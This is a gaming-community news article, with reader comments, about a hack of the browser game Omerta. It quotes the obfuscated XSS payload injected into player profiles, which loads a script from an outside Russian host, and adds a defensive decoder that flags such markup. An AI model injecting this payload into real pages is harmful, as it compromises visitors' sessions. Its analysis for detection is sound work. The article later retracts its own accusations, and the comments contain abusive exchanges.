22-09 [Upd #2] Omerta hacked
Author: sbanks
Last updated: 4615d 3h 16m 46s ago by LL
Version: 3.2
article
Last weekend Omerta had some downtime. The admins posted news that something was wrong with the server: a hardware problem, as Brando states.

Barafranca News: Connection problems - fixed

By Brando: There was a hardware problem which was solved by switching that machine off.

We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.

Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.

Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.


In reality, hackers had access to the database of Omerta. Due to the lack of proper coding on the hitlist page, hackers were able to run a "query" and get into the database of Omerta.

Result? All the information you could wish for "could" have been downloaded. This includes: successors, bullet amounts, passwords (MD5 hashed), emails, testaments... everything!

After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.

They wrote a small tool which would change all profiles ingame, about the same thing that happened versions ago (Stidda <-> Barafranca).

They reached about 800 profiles before it was noticed and the admins disabled images on profiles again.

Barafranca News: Removed Img(s)

onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)


Translation:
Once the page has loaded, create a script element, point it at http://a.itsr.ru/knas2.js and append it to the page's head.


This script loaded an unknown JavaScript file onto the profiles, which could have been used to cause harm once an affected profile was loaded. Unfortunately, we don't have that JavaScript file and thus cannot analyse the rest of the hackers' intentions.
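
The translation above can be reproduced mechanically, without ever running the handler. The following is an added example, not code from this article or from Omerta: the function names decodeCharCodes and inspectMarkup are assumptions, and the sample input is the handler exactly as quoted above.

```javascript
// Sample input: the profile handler quoted in the article, verbatim.
const SAMPLE =
  'onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));' +
  'm.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, ' +
  '117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( ' +
  'String.fromCharCode(104,101,97,100))[0].appendChild(m)';

// Replace every String.fromCharCode(<decimal list>) with the quoted string it
// builds. This is pure text rewriting: nothing from the input is evaluated.
function decodeCharCodes(text) {
  const call = /String\s*\.\s*fromCharCode\s*\(\s*([\d\s,]+?)\s*\)/g;
  return text.replace(call, (whole, list) => {
    const parts = list.split(',').map((p) => p.trim());
    // Leave malformed lists (empty items, embedded spaces) untouched.
    if (!parts.every((p) => /^\d+$/.test(p))) return whole;
    const codes = parts.map(Number);
    if (codes.some((c) => c > 0xffff)) return whole;
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Report what a moderator needs to see: inline event handlers, and URLs that
// only become visible once the character codes are decoded.
function inspectMarkup(markup) {
  const decoded = decodeCharCodes(markup);
  const handlers = [...markup.matchAll(/\bon[a-z]+\s*=/gi)].map((m) =>
    m[0].replace(/\s*=$/, '').toLowerCase());
  const urls = (text) => text.match(/https?:\/\/[^\s"'<>)]+/gi) || [];
  const visible = new Set(urls(markup));
  const hiddenUrls = urls(decoded).filter((u) => !visible.has(u));
  return {
    decoded,
    handlers,
    hiddenUrls,
    suspicious: handlers.length > 0 || hiddenUrls.length > 0,
  };
}

console.log(inspectMarkup(SAMPLE));
```

A hit on either check is a reason to hold the profile for review; neither check replaces stripping event-handler attributes from user-supplied markup before it is stored or rendered.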

Update:
We have now heard that the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.

Update:

As further proof, the hackers have released a list of 515 users with their set testament.

They also released the Global Vars of the server of Barafranca.

Update 28/09:

After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.

Later in the day, a statement was released on Omerta in which Bramblerose states that last Thursday testament info was indeed obtained through an XSS exploit. Today they have taken measures to protect the players whose data was obtained.

They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.

Update:

One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user IDs who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was completely accessible.

Update 30/09:
We're sorry for connecting the downtime with the hacks; we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems, and thus we retract this accusation.

We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
comments

Rix Netherlands (08:55:17 - 23-09)
Brando - rly at 05:22:18 on 23/09:
Sbanks email me.

I want a word.

You know my mail and if you don't you can get it by asking in #help

You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.

This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.

I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.

Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.

Short version: Fail, 'News'-hack.

There: Now you *know* it is *me*

:@
We gladly would have and still will put in your side of the story, and even write down or adjust our own conclusions like we did with the current evidence we got if you bring your own evidence or credible explanation.

Normally we would remove posts like these for the name calling by the way.
Rix Netherlands (08:50:03 - 23-09)
Anonymous at 06:08:35 on 23/09:
Brando - rly at 02:01:16 on 23/09:
Anonymous at 20:24:13 on 22/09:
Omerta hacked - again. They just don't learn. I remember the last 1, found all the bullets etc. from a list that was posted on public. And surprise, back then all images was disabled...kredu had "something" to with that back then :o


You people really believe everything you read?

Look out! NIBIRU!!!!!
Eh? I found myself on that list back then and I can say the list was correct, like bullets amount. was few days old data but correct so? Omerta = FUBAR!!!!
Well this "hack" is of course another one than the one you are referring to, in this one no data has been leaked or we at least haven't received it (but could still be possible). However, the database setup we received and is linked to in this article seems legit to me, who works on a daily basis with databases.
Anonymous (08:42:59 - 23-09)
Brando - rly at 05:22:18 on 23/09:
Sbanks email me.

I want a word.

You know my mail and if you don't you can get it by asking in #help

You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.

This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.

I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.

Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.

Short version: Fail, 'News'-hack.

There: Now you *know* it is *me*

:@


LOL this coming from an admin of the game :') yeah real nice image Brando you already don't give a fuck what players think and what ...and now you are abusing them ? ;') think you better take a good look at who the fuck is the ones paying for dc's and other bullshit whilst this game is still going to hell

you've lied before i no doubt expect it to be a lie again :w its almost getting to last straw here for me
Anonymous (06:08:35 - 23-09)
Brando - rly at 02:01:16 on 23/09:
Anonymous at 20:24:13 on 22/09:
Omerta hacked - again. They just don't learn. I remember the last 1, found all the bullets etc. from a list that was posted on public. And surprise, back then all images was disabled...kredu had "something" to with that back then :o


You people really believe everything you read?

Look out! NIBIRU!!!!!
Eh? I found myself on that list back then and I can say the list was correct, like bullets amount. was few days old data but correct so? Omerta = FUBAR!!!!
Brando - rly (05:22:18 - 23-09)
Sbanks email me.

I want a word.

You know my mail and if you don't you can get it by asking in #help

You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.

This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.

I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.

Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.

Short version: Fail, 'News'-hack.

There: Now you *know* it is *me*

:@
Brando - rly (02:02:50 - 23-09)
And that is all I can be bothered to react to. UTTER AND TOTAL NONSENSE.



Fact: Fewer babies are born in Europe than 10 years ago

Fact: Stork populations are declining in Europe

NOT Fact: Storks MUST bring babies then...


*Give me a break*...
Brando - rly (02:01:16 - 23-09)
Anonymous at 20:24:13 on 22/09:
Omerta hacked - again. They just don't learn. I remember the last 1, found all the bullets etc. from a list that was posted on public. And surprise, back then all images was disabled...kredu had "something" to with that back then :o


You people really believe everything you read?

Look out! NIBIRU!!!!!
Brando - rly (02:00:35 - 23-09)
Anonymous at 20:41:45 on 22/09:
so this means reset within 1 week i guess

Nope seeing as no damage was done.
Brando - rly (02:00:17 - 23-09)
Kyra at 20:44:17 on 22/09:
Anonymous at 20:38:58 on 22/09:
Kyra at 20:36:02 on 22/09:
Anonymous at 20:19:46 on 22/09:
Kyra at 20:15:23 on 22/09:
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!

because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r

how can you be stupid enough to believe they wont come out and say what they did, that i dont understand :p


im not that stupid Kyra :P but maybe this is there thinking im saying not mine xd

haha didnt meant you, was rhetorical question, meant admins :P


The whole article is rubbish and 100% made up. This is about 3 totally unconnected events.
Brando - rly (01:59:19 - 23-09)
Anonymous at 20:54:19 on 22/09:
I lol'd very hard what a nonsense

Correct.
Brando - rly (01:58:58 - 23-09)
Mcgee at 21:38:27 on 22/09:
So I was right, and Brando lied to me.... once again.
Nothing new really.

Well I have a soldier account with no bullets so I should shut the fuck up, but yeah man I was right!!!

Knew it was shady jamook business....

Congrats with the hijack by the way, you must be arch angels tweaking hell.


Rubbish.
Brando - rly (01:58:29 - 23-09)
Sbanks come and interview me about this. You made this up... combining issues which are totally unconnected.

This is the biggest pile of crap I ever read!


Come interview me for the truth - I thought you had better journalistic standards.

This is like reject clippings from a bad X-files script.

Steve
Mcgee United States (21:38:27 - 22-09)
So I was right, and Brando lied to me.... once again.
Nothing new really.

Well I have a soldier account with no bullets so I should shut the fuck up, but yeah man I was right!!!

Knew it was shady jamook business....

Congrats with the hijack by the way, you must be arch angels tweaking hell.
Anonymous (20:54:19 - 22-09)
I lol'd very hard what a nonsense
Kyra Seychelles (20:44:17 - 22-09)
Anonymous at 20:38:58 on 22/09:
Kyra at 20:36:02 on 22/09:
Anonymous at 20:19:46 on 22/09:
Kyra at 20:15:23 on 22/09:
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!

because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r

how can you be stupid enough to believe they wont come out and say what they did, that i dont understand :p


im not that stupid Kyra :P but maybe this is there thinking im saying not mine xd

haha didnt meant you, was rhetorical question, meant admins :P
Anonymous (20:41:45 - 22-09)
so this means reset within 1 week i guess
Anonymous (20:38:58 - 22-09)
Kyra at 20:36:02 on 22/09:
Anonymous at 20:19:46 on 22/09:
Kyra at 20:15:23 on 22/09:
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!

because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r

how can you be stupid enough to believe they wont come out and say what they did, that i dont understand :p


im not that stupid Kyra :P but maybe this is there thinking im saying not mine xd
Kyra Seychelles (20:36:02 - 22-09)
Anonymous at 20:19:46 on 22/09:
Kyra at 20:15:23 on 22/09:
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!

because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r

how can you be stupid enough to believe they wont come out and say what they did, that i dont understand :p
Anonymous (20:24:13 - 22-09)
Omerta hacked - again. They just don't learn. I remember the last 1, found all the bullets etc. from a list that was posted on public. And surprise, back then all images was disabled...kredu had "something" to with that back then :o
Anonymous (20:19:46 - 22-09)
Kyra at 20:15:23 on 22/09:
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!

because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r